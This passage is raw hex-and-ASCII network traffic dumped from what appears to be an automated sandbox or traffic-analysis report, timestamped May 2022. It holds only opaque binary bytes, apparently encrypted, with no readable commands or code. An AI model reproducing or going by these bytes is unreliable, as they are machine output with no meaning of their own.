fb 4f a3 e3 c8 3c 37 79 0d ef 75 8c 9c d0 8e 9f 8e 14 24 4c 20 5b 15 7c ca b4 ef fd ef e1 21 d6 3e c2 b9 c6 33 3b 22 8e 4a d0 3a a4 f8 cb 16 fa 9e 5e 4f eb e1
                                                      Data Ascii: =yk6xg)'NRf+r0PGgoyO`SD'mhy05!C5"7O#} nE362(Z|2gGw9,Epi\5qA7J=A66^+xXV^@Ln6W+1}1O<7yu$L [|!>3;"J:^O
                                                      2022-05-14 13:16:00 UTC31INData Raw: a3 61 83 a3 89 a6 ee a3 6f a7 8f d9 88 76 00 49 01 6b 59 9c e9 22 dd bb 58 59 3f f4 36 4d cd f9 6e 9a 84 01 b0 36 f7 1b 92 29 f5 23 50 6f a9 aa c5 a2 c4 b2 1e 59 06 57 10 ee f8 d2 ef 36 0f 3f 32 1c 56 63 bb a3 e7 9f bd 34 60 69 0e 50 ca ed d7 88 4b 2f 09 04 93 28 eb 91 26 c8 d8 c5 e1 a8 41 fc 8d 6a 0a ae ec 36 6e ee 96 00 f6 86 13 a7 c6 d6 91 ed af ab 4a ce db 0d 23 40 f8 31 b9 4d 8f a4 85 dd 6e 99 61 17 d5 17 3e 29 50 3d de 8d ea e5 c7 ca 6c 76 52 55 c0 ca f7 a5 55 4f 2e 48 71 5c 33 34 9f 26 95 6f c3 73 9f b6 62 65 5e a4 cd 4a 26 5b 46 34 8a 5d 8b e8 c9 78 37 06 e7 66 c2 68 22 3e 40 b4 d5 74 66 d3 ee e1 6a df f0 43 0e 51 af cb 0b f0 80 7c 59 5d 24 c4 e0 25 fb 83 93 10 2e 45 9c f8 7f ac 7e 81 ae 6c 14 68 4a a9 39 0f b9 92 c6 11 17 e5 ca 58 d1 01 0d de 6f
                                                      Data Ascii: aovIkY"XY?6Mn6)#PoYW6?2Vc4`iPK/(&Aj6nJ#@1Mna>)P=lvRUUO.Hq\34&osbe^J&[F4]x7fh">@tfjCQ|Y]$%.E~lhJ9Xo
                                                      2022-05-14 13:16:00 UTC33INData Raw: b4 bf 59 cf 84 e0 5c 86 53 cb 96 45 75 a8 82 79 e2 de 67 6a 77 40 80 08 58 ad 57 3c cf d6 41 f0 c5 c5 58 74 0c b4 16 6f 8a fd 16 4b c8 0b f1 51 27 ef cd d7 05 44 b4 c8 d2 eb 43 00 92 da ec 54 2e ad 2e 63 0c fe f3 77 14 4d 7c f9 f1 59 20 b9 82 82 05 a4 d8 3c 04 ee 8d 1b 3b bd af 15 5f 84 ab c5 23 1f bc 81 10 7f ef 4b 6a 11 96 d9 46 4e 81 eb 6d 16 c5 a0 5c 70 d8 0b 7c e4 f0 93 0c 26 f3 7c ce 7a b3 d0 97 7a dc b4 8d 8a 96 06 1f ce e6 2e b0 36 b8 10 68 93 2e d1 6b 15 9e 8c 4c 47 02 bc 4e c9 99 d2 b6 ca d4 7c 20 5c e4 2d 38 e1 85 e5 c8 5b c9 43 fb d1 03 7e e8 04 a7 1d 2e 87 48 cc de 60 86 43 37 ef ad aa fd b4 4d 63 8a 29 7a 17 a9 ac 04 6f 54 2c 71 44 a6 95 28 75 6b bd 7b 02 ef 9b b3 07 18 94 04 b7 05 5c 10 38 30 c0 6b 6e 34 ad 5d e4 f4 4c 31 3f 0d 0d 1a 0a f3
                                                      Data Ascii: Y\SEuygjw@XW<AXtoKQ'DCT..cwM|Y <;_#KjFNm\p|&|zz.6h.kLGN| \-8[C~.H`C7Mc)zoT,qD(uk{\80kn4]L1?
                                                      2022-05-14 13:16:00 UTC34INData Raw: d5 c1 5e fa 4a f6 f5 a8 ac bd bd 10 07 b7 74 db 7a 39 98 0d 50 2d bd ae f0 27 81 8c 74 a9 4f cf 75 cd e6 0d e3 84 30 e4 ef e0 ac b0 0f 14 b9 dc 0f 16 f4 f7 9f 92 b7 39 90 0a 7c cd 31 5c ea a6 a3 3b 2d 52 41 a5 68 45 0f 5c 53 79 80 64 ab ab b7 01 db 90 77 e2 08 96 4f 20 bc bb 0a fe 3c ad ca b1 58 4a 4a 11 56 2a ff 3b d3 3f f8 e2 d5 49 51 f8 87 3c 56 58 00 05 9e 71 56 bf 4c c9 4f c2 16 b9 6f 4c f1 06 27 f9 32 56 b5 09 b4 33 bb 29 d4 60 55 18 aa cb 83 fe 35 b3 dc f3 70 d2 88 82 82 db 3e 95 67 a6 72 d3 ad f0 f0 9b 54 2c 01 fa 2d b7 ef 45 c8 b8 f9 5f a9 44 e5 97 7e 09 88 3a 06 2d fb 44 d1 05 14 a3 bb 12 02 11 14 e0 e0 05 1b 2e a0 fd 1f 4b 67 08 a5 a1 8d 32 7e d0 88 97 2d 83 34 87 94 85 cf 23 2d ef f0 91 0e 89 cd 49 c9 12 63 54 94 03 ab 43 84 ee bb 40 86 be 64
                                                      Data Ascii: ^Jtz9P-'tOu09|1\;-RAhE\SydwO <XJJV*;?IQ<VXqVLOoL'2V3)`U5p>grT,-E_D~:-D.Kg2~-4#-IcTC@d
                                                      2022-05-14 13:16:00 UTC35INData Raw: 55 52 92 8f 3e 33 27 25 dc 86 5a a8 53 7f ff 9e 92 55 d0 8d ef f2 01 c6 89 0e 3a 4a fb 08 62 03 f7 88 1b 23 dc 82 44 fe 1c 26 1f 39 db 2f b8 5b 3e 61 54 e4 e5 6f ae 31 f1 b7 79 ad 31 aa b3 73 d3 48 b4 1b 57 1f c0 1d 04 27 67 06 2e a8 e3 6b 02 71 21 24 34 b8 4f 43 ba 55 67 ad fc 1f f5 69 14 e6 9a 95 49 bc 38 d9 7b fb 55 f5 d4 2f d0 2c 14 71 e0 68 77 0d 8b 30 c5 c3 e0 43 da 93 73 bb aa e2 af 8c 2f 43 30 dc 6f 9e 7d 6e 1e 4b de b8 d1 95 11 93 65 06 e5 76 45 b7 68 a2 bc f4 20 85 8a 47 31 89 ac cf d1 ec 7d 0c f8 4d a4 5d 34 22 f3 a8 c4 5b 40 b1 42 e0 df 7f f8 30 84 b7 db 43 5c 9c dd 40 e3 23 e4 b6 67 82 4f 59 d2 26 40 fa 65 a5 2a 04 4f 7b bc 2c ed 28 24 be c9 8d 34 f0 13 38 7d b7 e3 d0 34 ac f8 e8 c5 5d 7e 52 b0 40 69 f9 b6 51 e9 33 eb 34 31 d4 90 53 ac a4 b5
                                                      Data Ascii: UR>3'%ZSU:Jb#D&9/[>aTo1y1sHW'g.kq!$4OCUgiI8{U/,qhw0Cs/C0o}nKevEh G1}M]4"[@B0C\@#gOY&@e*O{,($48}4]~R@iQ341S
                                                      2022-05-14 13:16:00 UTC37INData Raw: f2 cf 47 95 69 24 5f d2 a9 31 1d a0 80 98 05 50 fd de a0 b5 a5 5a 5b c6 ef b2 f1 f4 20 8a 7f fc 63 51 32 2d cb a1 d9 8d 0d 9f 57 a9 2b 48 e6 13 ba 0d 9d fa 0d 12 c3 29 0b 9b 6d 10 0e e8 6b 2c 68 f0 22 b6 44 57 f2 72 de 9f 64 ec 9c 24 d2 7d 2c b3 61 26 ec ee 4e 00 e6 c0 ee f0 f9 dc 1c 47 06 af 41 08 49 57 00 a4 46 5b 14 09 70 d3 08 1f 25 89 50 01 f9 8f 2b 3a 3d 6c 8a 42 54 79 65 07 d1 1f 1c 1f 0b 0a 09 b7 bf 51 e3 de e0 20 09 97 0b d8 3d 62 6e 18 1f ab 38 2f e9 3c 5f 3c 0d bb 53 68 1b 47 da ea 65 18 74 ea a4 6b 5e 26 2d d7 de b7 9f 9e 46 f2 7f 71 3d f2 dc 06 18 00 cb 1c d0 9d e9 cd 27 71 7d df a1 36 40 46 0a ed 48 bd 6b f0 ac e1 36 a4 97 48 f7 5b aa 45 69 ee 37 00 c4 32 f0 14 b7 bd c7 ff 92 c3 e3 66 9f 43 32 35 38 5a 69 71 87 68 ec 50 63 75 66 bf 54 f2 50
                                                      Data Ascii: Gi$_1PZ[ cQ2-W+H)mk,h"DWrd$},a&NGAIWF[p%P+:=lBTyeQ =bn8/<_<ShGetk^&-Fq='q}6@FHk6H[Ei72fC258ZiqhPcufTP
                                                      2022-05-14 13:16:00 UTC38INData Raw: 26 51 77 10 76 fb 37 dc b8 07 6d 3b 60 6d d8 ca 82 f2 ce 6b 85 98 28 c2 a1 50 22 2e 77 34 e4 56 be b4 b9 5b d7 0d 63 93 6c 80 6c 64 d3 85 11 9b b6 1b 4b 23 d3 39 a6 4f 93 66 d7 32 bc 6b 7c 55 c2 f7 56 a1 43 38 ce 2c 52 f3 4f d1 bc 41 80 3d 04 90 bb 72 37 85 fa 31 34 5d 13 b7 17 5c e7 6c 30 0a 76 64 29 6b d6 e9 21 f9 63 70 8a c2 fb ea 9b 9b 29 9d fd 41 6b bd c8 40 95 a1 1e 78 b1 f8 30 a3 95 de 3f da d5 cf a1 4d 3e a5 e3 3e 95 7c 93 b5 d9 47 85 e9 49 67 8e e5 c5 a8 fd 7c 36 0e 7b 40 eb 0b c8 5b 63 c8 10 f2 59 75 56 e8 f6 2f ba 02 23 9e 23 2f a2 e1 91 95 50 ad 9c 0f 42 35 63 de 16 21 ba 08 31 9a e2 1b 9b f6 be 87 42 66 a1 15 0f c0 91 c9 9b 11 c3 8c 57 09 e3 cf 33 5f ea f6 d8 0f aa b8 37 26 18 84 e9 e7 68 ba de be f6 cc ad c4 e5 01 b4 f9 56 3d 38 3f 78 c8 b3
                                                      Data Ascii: &Qwv7m;`mk(P".w4V[clldK#9Of2k|UVC8,ROA=r714]\l0vd)k!cp)Ak@x0?M>>|GIg|6{@[cYuV/##/PB5c!1BfW3_7&hV=8?x
                                                      2022-05-14 13:16:00 UTC39INData Raw: 8c f6 f4 70 49 19 73 a1 71 46 a1 da 18 86 dd d1 48 93 11 63 cc 30 f6 8e b1 6b 45 19 7e 52 4b 38 69 22 70 0b df c2 54 35 b2 9a 3a 95 c4 00 2e f0 68 f1 b8 e7 db a3 e6 b8 66 d1 f0 bb 8c 95 4e 13 04 25 36 da 2d 56 18 f3 f7 39 82 83 28 c1 ab 8b d6 cd 8c 62 4a 2f e7 b2 22 e5 77 be a9 d9 c7 23 05 37 70 9b 45 51 b6 03 88 7f 10 cf 22 cd 38 e3 db e0 ce 7d 52 99 4e 09 77 0c bd 96 68 bf 8e 97 9c c1 37 63 2c 41 89 62 bf d0 2d 04 76 15 22 ad 1e e7 f8 74 c3 9d 59 81 5f fc da e2 be 80 b5 6e 1a d7 1c a4 d7 26 91 bf 4a 88 2b e3 e2 45 cd f6 f1 b3 9d 27 df c7 b2 d8 16 f0 be be 78 d5 a1 17 a5 17 d5 1a a6 12 26 e4 a9 9a a7 b0 3f 1d 4c 7f 72 d2 87 fb 4b 20 3d 70 f9 2a 96 38 f3 f0 6e 49 08 88 23 ae 52 82 53 50 c5 26 7b 86 71 b2 47 e9 82 3e 67 59 dd 49 dc 52 09 44 3b 2d 23 fd bc
                                                      Data Ascii: pIsqFHc0kE~RK8i"pT5:.hfN%6-V9(bJ/"w#7pEQ"8}RNwh7c,Ab-v"tY_n&J+E'x&?LrK =p*8nI#RSP&{qG>gYIRD;-#
                                                      2022-05-14 13:16:00 UTC41INData Raw: 0b a7 84 53 52 46 3c 66 16 0a 3e 28 df 1d 6a 90 12 4b 95 42 66 cc 70 76 3c 52 06 0b 9b 30 c6 1c b5 e4 6c cc 66 d2 d9 c1 b9 0c 15 dc 60 5f 7a bc f2 39 9a 04 d0 41 58 64 b4 c4 37 c9 6e d2 e2 4b 24 5e e8 75 ab a9 70 2f 31 22 1b 9e af 1d 24 01 7d 28 3a b8 c1 bb c9 ed 6d 61 28 93 2b b3 65 26 42 9c e1 db cc a9 d5 76 eb f1 3b 77 f4 b0 8d cf ad 84 3f 30 31 f1 bc af c7 65 9d f5 ab a2 3d f5 d2 2d e9 7a d6 37 9f 0f 1b 32 39 6d fd 30 27 18 9e 72 da 0b 2e e0 a6 25 ff 70 8b 9c a9 17 8e 2c 6a 8d 05 31 b0 0c 45 40 b3 a9 5c f1 91 43 82 35 8c 7c 32 be 09 d0 14 df e7 eb 26 9a 91 e0 a4 34 f3 71 ba 8e a8 ad 1c b8 97 85 eb ec 9b 30 2b 04 11 87 4b 01 86 98 a8 bf 1e ea 02 e5 c9 21 ae c3 29 bb d2 82 6e 0f 8e 91 2b 04 7a a3 99 d2 62 76 86 db b4 ad b1 b1 56 d8 93 4a dd 5a 01 ec c0
                                                      Data Ascii: SRF<f>(jKBfpv<R0lf`_z9AXd7nK$^up/1"$}(:ma(+e&Bv;w?01e=-z729m0'r.%p,j1E@\C5|2&4q0+K!)n+zbvVJZ
                                                      2022-05-14 13:16:00 UTC42INData Raw: cb 15 d8 1c 66 18 b0 9b eb f9 df 6d 21 96 2f 82 1a a1 a1 91 1e 28 eb 82 5c 7e 25 be 9c 7b 4d 4f 0c 3b e2 ac 94 0d ff 84 4e bc b5 d0 b1 16 56 0e 80 eb 42 45 43 91 23 ef fd 00 11 2f 6b 16 a3 24 61 7d d6 b8 d4 1c ab 93 b3 a3 aa 10 4e 4b b9 2c 9e 88 f3 ef 9c a8 9b 67 1d 28 20 d0 ed 2f 43 d4 99 c8 69 40 50 e0 c5 97 a5 d8 7d 35 b6 9c 0d 9e 4a bd 73 04 e6 b7 53 25 f1 c3 00 bb cc bb 00 5e 30 2d 8e 34 ad a6 c4 e3 7c 4d 97 48 32 7a 9d 87 35 c3 df a6 33 98 bb 46 d8 0d a2 22 0a b2 e8 c8 b2 37 ed 84 3b a1 71 2b 2c 73 17 73 0d 57 cd a5 f1 c9 22 38 3d f0 df a3 82 29 fb c6 81 3a cb 05 06 15 b0 72 20 25 d0 74 dc 83 6b 47 61 7a 63 03 fb 15 f1 df 89 6a 17 9a 33 78 d3 f6 19 1b bc 11 90 ce ad ae fb 61 39 25 e1 32 bf 06 0b b9 ab f3 7a 6f d5 b3 4e 3d b4 f0 ed c1 81 57 c9 40 26
                                                      Data Ascii: fm!/(\~%{MO;NVBEC#/k$a}NK,g( /Ci@P}5JsS%^0-4|MH2z53F"7;q+,ssW"8=):r %tkGazcj3xa9%2zoN=W@&
                                                      2022-05-14 13:16:00 UTC43INData Raw: 92 bd 8d b9 3e 42 9a 1e 1d 16 30 98 9a ce 87 b2 21 4b 60 24 28 31 b0 32 0b ac ec 6a d1 4f 9f ca 04 24 b1 79 65 57 d5 3a f9 1a 1d cd ca 4f 6b 8b 71 64 fa e5 cd 7d 4d a7 66 e7 ab ce 63 16 63 2d 08 83 56 63 eb 76 91 ae e5 d9 9c 63 8e 37 65 72 c8 3b ea a7 fe 8a 77 9b 1a 64 45 e3 38 2e 48 72 92 61 a5 32 b4 36 da c6 ae 51 00 3d 7a 51 aa d8 75 7f 14 02 c0 75 ae 44 8a 74 1a 89 ed 46 03 17 22 81 5e f5 30 b8 ed 8c 82 f5 9d a7 69 9d c6 a5 85 80 90 28 e8 8b 36 5c 0a 61 77 45 78 1c 79 39 e3 a6 29 28 ed 6b f3 56 0c d0 3f 1c 82 36 90 55 29 12 dc 02 97 b7 db 59 c0 62 67 c3 1d 8f d4 f1 b8 8a 00 fb 15 19 e5 ee c5 48 93 67 74 52 71 93 18 54 c9 92 75 70 63 10 43 d8 b1 4b 27 2f ad ff 86 34 5f a3 3e d7 a5 15 a9 fe 16 15 fc 21 0d ac d0 f0 a9 37 54 e0 49 17 47 e7 5f 2e 5c f0 54
                                                      Data Ascii: >B0!K`$(12jO$yeW:Okqd}Mfcc-Vcvc7er;wdE8.Hra26Q=zQuuDtF"^0i(6\awExy9)(kV?6U)YbgHgtRqTupcCK'/4_>!7TIG_.\T
                                                      2022-05-14 13:16:00 UTC45INData Raw: 5c ef ef 3d 36 f8 0b 49 ac 31 c7 ff ff 8f 7f 31 6a 11 bb 05 24 78 54 e7 72 ff 56 e5 df de 03 03 16 0f 24 a4 8a 0e 06 e0 24 97 63 c5 75 0c 6d fe 9f dd 25 ef 11 c1 be 11 4a 73 dd 67 1d e5 fd 5a 9f 1a 64 c3 22 36 65 bf 79 6a 7d a3 fb 07 37 85 2c e1 d2 50 de 31 61 79 e0 04 0c 8d aa 35 25 aa d3 fb 84 50 fc e0 2e 07 95 69 85 ca 01 e0 b3 a2 b1 8f 86 de a8 9e de 1c af 40 97 8e ac c8 23 32 2b a2 2a b5 57 b5 10 63 01 5b bd c8 44 32 93 eb f0 55 a0 71 c1 9c 2c 28 8f 85 f6 48 5e a2 99 bc 9b 47 ab ae ab 0f 45 36 08 de 67 3c 75 fc ce ef 31 17 5a 0b 4a 8b 6d 68 ed 20 2b 6c fe db ab d6 08 a0 4b 30 23 30 28 4a 59 e5 e1 35 ad d3 2b 06 de 44 af f0 3a a6 f2 9f 85 24 fc 08 38 aa 93 fc f1 9c bd 57 68 a4 c1 5b 9f 40 06 e3 68 bb 8f bc b9 2c f8 da 53 98 5a b5 6f 09 d8 63 9a 6d a9
                                                      Data Ascii: \=6I11j$xTrV$$cum%JsgZd"6eyj}7,P1ay5%P.i@#2+*Wc[D2Uq,(H^GE6g<u1ZJmh +lK0#0(JY5+D:$8Wh[@h,SZocm
                                                      2022-05-14 13:16:00 UTC46INData Raw: 58 9e a9 f7 e4 ce 21 d3 20 94 31 f8 42 fc 42 69 62 91 65 77 46 c8 3b d8 2c b9 6a fe 26 82 9b 86 06 ce f2 ca 09 2e be f8 0a 53 1e 51 4e 2b 37 81 ed 3b d8 19 d4 86 9b 4c ef d6 24 9c 9d b3 f3 15 42 8a 25 aa 64 7e 3e ec c6 5f 3f d0 73 3c 45 f0 df 42 8e 71 0a ed 6f ef bb 17 6a a1 89 be 57 83 a1 20 17 d5 47 fb c1 68 11 31 18 04 be 03 f8 a3 db 66 86 36 0c df 4a bd de 32 d6 91 bc 47 aa eb f7 6e 65 2b 82 87 ae b3 52 da ce 96 46 27 5e d8 91 4e 9e a1 fa f0 8f 30 d5 85 ce 0c bc 0c 3d 7a c8 34 89 0c a0 25 54 f7 85 bc b9 60 03 4b 59 8d 81 62 ac f5 15 d3 22 7d ef f0 e4 29 b2 09 97 7b ea 28 19 93 d5 18 3e f7 fd cb 3e 3c 57 94 cf 5e ca 3b 91 bb fb b4 af 16 1a 80 0a f5 68 08 68 c2 51 dc 7f c0 99 f9 dd 7a 30 78 41 62 17 eb f0 4b 99 19 51 5c 6c ce 3e fd 59 f8 ad c9 86 65 ff
                                                      Data Ascii: X! 1BBibewF;,j&.SQN+7;L$B%d~>_?s<EBqojW Gh1f6J2Gne+RF'^N0=z4%T`KYb"}){(>><W^;hhQz0xAbKQ\l>Ye
                                                      2022-05-14 13:16:00 UTC47INData Raw: a4 85 a6 97 9f a8 df b7 00 8f e7 c5 0a af 92 24 1a 0b 02 46 56 8e dc 7f 9f 22 60 6a 58 81 db 84 a0 b4 90 af 57 de c5 ee d1 ed 57 cc 5f c5 c1 86 31 a2 3e a7 4c 58 3f 14 34 43 81 57 e5 25 c1 1f 1b 83 38 8e 3b 40 ed 6b e6 29 65 b9 6d 50 9a 4b 96 fc 29 74 e2 37 f1 c3 fc 3b 84 60 f1 e5 0d e5 8e 0c 15 4e 8c b6 65 32 e0 34 46 b9 6b 9f 42 89 49 f8 36 a8 92 92 ee b2 25 94 c8 29 90 6c 82 58 60 eb 6f a4 dd 18 92 dc 4e 9e 47 5c 65 f8 71 d5 6d 44 1c 71 b5 1e 6e ce 99 e2 af 83 c0 1c 4f 7a 17 5a 59 1e 3f e9 ae 42 7c 15 86 e9 7c 19 86 89 02 ca dc ec 65 31 9e 64 93 21 7c ac 9f 05 c6 08 8a 40 26 be 1b ba cc 2d d2 84 b9 d9 6b 21 ef f1 b8 3f 25 36 94 a3 c5 e6 e9 b0 8c 06 8c cd 63 d1 a3 6f 49 39 91 d0 53 d6 e7 1a df f7 f2 51 90 c8 c5 7b 80 1f 32 e1 61 92 55 b0 b2 16 ad 0a 4d
                                                      Data Ascii: $FV"`jXWW_1>LX?4CW%8;@k)emPK)t7;`Ne24FkBI6%)lX`oNG\eqmDqnOzZY?B||e1d!|@&-k!?%6coI9SQ{2aUM
                                                      2022-05-14 13:16:00 UTC49INData Raw: e0 30 8b e6 d7 4b d6 5f aa 54 4b 4f 94 ca 59 97 f4 55 ec 2d 03 37 62 a4 e9 d0 c6 ac 4d 7e 70 1d 50 fd 60 a0 0b a7 5e 42 50 0b 9b 02 5a 07 33 77 8a d3 f6 62 c4 bf 71 3a 06 10 8a a4 6b b9 84 35 61 65 f1 91 f5 31 4a 61 9e a5 10 a3 4e 28 83 9e f1 8f ce df 5c c2 1c a4 e5 ef 11 fd 2c 4e 81 e2 8d 11 fe 6a e2 f4 34 b6 16 a3 11 a8 a0 56 56 fd 1c d5 1f 6c 82 bf e1 e8 e8 d6 71 a3 5c 8f 14 27 e4 39 00 c7 d1 b9 b1 2b 75 24 5f c1 01 cd e6 55 4e 73 0d b3 97 ca 5f af 3f b0 e6 a0 fe 23 ee cf 19 9c a9 4a 0d 06 a4 72 fa d6 78 46 7e 69 02 5a 12 7f fa 05 2f 5c 3c 5d 44 28 6d cf 4e 1c 17 ea 98 81 5b b4 13 fc 2c 25 a2 bd 13 78 4a 80 4a 34 f8 ba 87 a6 69 eb 5f 24 90 bb bd b1 bd 5a aa 23 66 29 4c 80 d6 53 ff 15 85 57 8d fa 22 31 87 65 fe 15 63 e0 0a 11 07 0f 8e 14 8b cf 81 c8 47
                                                      Data Ascii: 0K_TKOYU-7bM~pP`^BPZ3wbq:k5ae1JaN(\,Nj4VVlq\'9+u$_UNs_?#JrxF~iZ/\<]D(mN[,%xJJ4i_$Z#f)LSW"1ecG
                                                      2022-05-14 13:16:00 UTC50INData Raw: 05 6a c2 49 3a 3c d7 4b 58 92 8e 75 59 b4 fd 0f 3a 78 a7 18 61 e8 49 de 22 12 f9 99 93 d1 9f 1f 67 b6 44 22 ea e4 08 35 db 45 b3 34 34 3a dd f9 df 8e 37 79 25 d1 e5 bf c6 f0 81 eb 2e 6f 1f 9e 34 ab 7f 5e 15 ed ca e1 9b f2 40 b6 80 86 15 67 2d 7f 3a 3d e6 5a e9 e2 50 07 c4 2e 2d fa ee 8d f7 1e ef 05 e0 96 67 d9 70 48 a7 7b fe 3a 39 32 b4 34 9d 0f 96 d5 d0 20 d1 76 eb 90 74 4c 2b 87 9b 05 30 da 72 80 e8 2c 67 cc e4 27 00 fd c9 66 53 05 37 81 2b e8 1f bd 03 fa 77 17 6f 02 9c 76 df 8d 4a f1 35 12 8e 09 3d 55 ba bc ae a5 8d e5 00 18 24 dc d4 fe 50 69 57 0f b1 5e fe 14 9b 53 57 06 0f da 61 eb 51 e7 57 a3 03 9c 86 28 7a 8d c1 b5 4d 3d ca 05 d3 69 f1 13 97 17 e2 ae f2 94 78 57 95 f4 93 e8 18 0e 56 15 c5 3a 18 03 21 17 31 00 c1 45 66 5f fa c7 d9 44 91 3c 67 5c 85
                                                      Data Ascii: jI:<KXuY:xaI"gD"5E44:7y%.o4^@g-:=ZP.-gpH{:924 vtL+0r,g'fS7+wovJ5=U$PiW^SWaQW(zM=ixWV:!1Ef_D<g\
                                                      2022-05-14 13:16:00 UTC51INData Raw: 4d bf 5b 5f 48 56 aa 32 9b aa 4c 31 05 5d a3 c3 3f 5b ca da 97 fa 07 b1 2d 4f b4 8e f3 bb 30 2e 75 77 be c2 b2 62 93 19 69 0b 08 2f 78 45 74 e0 d9 46 fc d7 19 8b 18 63 cc 1f cb 36 ad 35 ab 59 1b fa f2 e4 23 af 27 e6 05 25 ae ca 2d 4f 7c 33 77 0b 6c 1f 39 16 1b a9 ab 70 00 63 92 d1 a3 d5 f0 39 5e e6 0c 34 14 07 c8 0f 8b 44 79 3f 6f b7 d4 eb 1a 31 ae fb 0e 35 32 62 b4 4a cd 0b cf 25 65 07 81 7b b9 3b 39 fc fe 1e 72 e0 c7 1a 44 bf ed 59 56 e6 e5 08 49 21 f2 7b 96 b6 90 8a 68 d0 c5 8f 52 8c cd 7a 30 48 80 59 1b d5 b1 7e 24 dc e3 79 6b e8 d6 1f 5c d8 2f a3 5b 10 86 62 04 da 9b b1 6c c5 76 85 b6 a7 9b 7d 03 c2 d9 05 d1 2c 8f b9 61 f1 71 d4 17 e5 01 0d 4d 0a e4 a7 62 a2 76 99 d9 0c 0e 01 7c b5 c1 34 6f e8 dd 61 63 0d 08 5d 98 3a 2e 26 20 0e f0 e6 7f a8 d8 39 64
                                                      Data Ascii: M[_HV2L1]?[-O0.uwbi/xEtFc65Y#'%-O|3wl9pc9^4Dy?o152bJ%e{;9rDYVI!{hRz0HY~$yk\/[blv},aqMbv|4oac]:.& 9d
                                                      2022-05-14 13:16:00 UTC53INData Raw: 70 98 df d9 e5 17 04 33 7c 45 e6 ba 61 f1 7f eb 37 6a a0 79 f2 83 79 84 23 a5 5d 56 04 29 3a 0e 6f 15 4b 1b c1 40 fb b7 98 77 8d 61 d8 4f 7f 40 d1 f1 3c bd ef ee 8d 3b 4c a7 dd bb a5 46 c0 3e ee a3 c9 65 57 d9 67 21 06 14 55 e9 6b fb a9 6c b8 da 3e 0f 0f 51 e7 a6 4f 54 05 29 ad fc d1 41 b0 c2 fc a9 fa 5c 19 49 3b 4d cb b6 53 a5 f4 4d c1 a3 eb a8 72 3a 0c 67 28 31 b0 92 16 4c b8 35 bf 35 7a 1b 11 22 5b da 59 a4 7a 48 bc 89 8e c4 86 09 49 72 62 3a c8 ce 6f bf 1c d4 98 b7 fc 4d 1d 4e 35 15 10 a3 14 4c f7 1e 07 ce f6 1a 8e ef 93 94 87 b6 d0 80 f9 56 a5 23 3d 7e 6d 5f da 98 cd c4 d1 91 ed 6a 30 34 b6 c5 58 f2 bd f0 b4 97 7e d6 fb 19 2c c9 b8 3d c7 b2 cc b4 72 ba e1 f6 e2 41 ae d4 ba be f9 81 22 81 72 7e 7b eb 17 ba 65 ef ca 42 bc 36 7c a0 98 60 4a 10 8a bf 5e
                                                      Data Ascii: p3|Ea7jyy#]V):oK@waO@<;LF>eWg!Ukl>QOT)A\I;MSMr:g(1L55z"[YzHIrb:oMN5LV#=~m_j04X~,=rA"r~{eB6|`J^
                                                      2022-05-14 13:16:00 UTC54INData Raw: 80 ab 86 8a 2b 2f b6 d2 5c 9c 75 27 65 c1 02 cc 6f 91 f2 72 dd 80 cd e2 cd 76 c9 d8 77 1e dc cd 33 8a 1b 8c cd 16 63 44 de 06 db cf 65 b1 54 14 76 b1 78 30 45 94 69 df 1e 6f d1 33 49 c0 d0 95 65 e1 46 33 40 d1 21 25 dc aa 0e cd 26 3b 4b 05 68 c5 bc 5a 2c 59 2f fd c4 88 3e ce b1 74 56 9b 7d d4 ce a0 9e 57 bb 6e a2 51 c6 81 cc 66 ca cb 73 48 6d b2 7c 75 66 83 06 b1 43 d4 3e 80 d9 e6 d1 00 f9 ae b8 26 d5 19 c3 0e 8f 80 da 2e f6 19 c2 79 8b 4e 50 a4 2b a9 f6 e0 40 39 18 65 1f b7 91 33 d2 3b 0c ca 93 1a de 90 67 fd 37 b1 a7 d3 2a f1 79 1c 02 0d ea 3c 57 1f 03 e6 7a 45 15 fd 23 d2 2c 9e cc 3f 87 e7 7a 15 42 2a 03 80 46 bf 69 df d5 aa ca 48 ba e6 12 a3 b9 88 31 48 a0 86 7d ff 62 eb 14 da 3f 64 b4 53 39 2d 5c 98 c4 33 3e ce 9e 4d b1 57 d5 c6 3f 86 22 fa e7 0c a1
                                                      Data Ascii: +/\u'eorvw3cDeTvx0Eio3IeF3@!%&;KhZ,Y/>tV}WnQfsHm|ufC>&.yNP+@9e3;g7*y<WzE#,?zB*FiH1H}b?dS9-\3>MW?"
                                                      2022-05-14 13:16:00 UTC58INData Raw: 72 71 66 4f e5 f7 62 57 5a 60 64 52 ba d7 de f3 da 42 7c ae 5b 70 5b 1c a7 6a 7b 04 00 ea e3 c7 bb 2b 3a 94 b1 3a 88 c9 7c 6c 8e 17 b4 d4 34 4c 70 c4 41 ea b4 90 06 78 69 e6 67 bb 2c 0e 68 ec 0a a8 5a 9a 16 53 09 74 8e af f4 1c e9 7e e7 0e ca d2 91 00 35 a7 13 e7 88 f6 00 8b 69 20 22 e1 81 30 b0 0f 19 05 6d 93 01 3e 34 af e4 72 20 cf 30 40 40 00 e4 ed bb ff 44 82 31 7d fd c0 34 c4 1b 10 3b 01 7f 09 2a e5 55 f9 6b 23 5d 65 77 59 e4 0b bf 62 5e 8d b7 19 f5 79 31 f7 13 a3 e9 53 cf c7 55 92 ef c8 5c 29 43 9d d0 80 14 61 06 97 10 bf e8 66 63 02 84 4e 29 cf fc 20 f5 c2 10 a8 22 e3 ed 7a b8 78 8c 87 2d 87 f6 75 01 c3 0a ff d5 08 d5 79 59 11 e4 ed 2f f7 46 49 7f 43 4c 9e 93 1f d7 1b 2d ca 4f d3 87 b1 24 ec eb 13 a1 e1 88 49 36 81 2b 2e ed 37 d5 21 19 6c 98 be f3
                                                      Data Ascii: rqfObWZ`dRB|[p[j{+::|l4LpAxig,hZSt~5i "0m>4r 0@@D1}4;*Uk#]ewYb^y1SU\)CafcN) "zx-uyY/FICL-O$I6+.7!l
